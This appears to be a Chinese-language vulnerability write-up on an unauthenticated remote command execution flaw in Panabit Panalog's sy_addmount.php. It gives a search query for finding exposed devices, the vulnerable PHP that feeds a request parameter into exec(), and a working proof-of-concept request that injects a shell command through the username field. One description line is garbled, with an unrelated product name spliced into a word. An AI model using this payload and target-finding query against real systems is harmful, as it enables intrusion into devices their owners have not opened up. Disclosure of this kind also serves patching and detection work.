Panabit Panalog sy_addmount.php 远程命令执行漏洞

# Panabit Panalog sy_addmount.php 远程命令执行漏洞 ## 漏洞描述 Panabit Panalog sy_addmount.php过滤不足,导Seeyon程命令执行漏洞 ## 漏洞影响 Panabit Panalog ## 网络测...

Panabit Panalog sy_addmount.php 远程命令执行漏洞

漏洞描述

Panabit Panalog sy_addmount.php过滤不足,导Seeyon程命令执行漏洞

漏洞影响

Panabit Panalog

网络测绘

body="Maintain/cloud_index.php"

漏洞复现

登录页面

img

存在漏洞的代码为 account/sy_addmount.php

<?php

include(dirname(__FILE__)."/../common.php");

$username = isset($_REQUEST["username"]) ? $_REQUEST["username"] : "";
if (empty($username)) {
    echo '{"success":"no", "out":"NO_USER"}';
    exit;
}

$username = addslashes($username);

$rows = array();

$cmd = PANALOGEYE." behavior add account=$username";
exec($cmd, $out, $ret);
echo $out[0];
exit;

其中没有对身份进行鉴权,且 username 可控,构造POC

POST /account/sy_addmount.php

username=|id

img

  • 发表于 2024-07-12 18:49:46
  • 阅读 ( 1797 )
  • 分类:网络设备

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计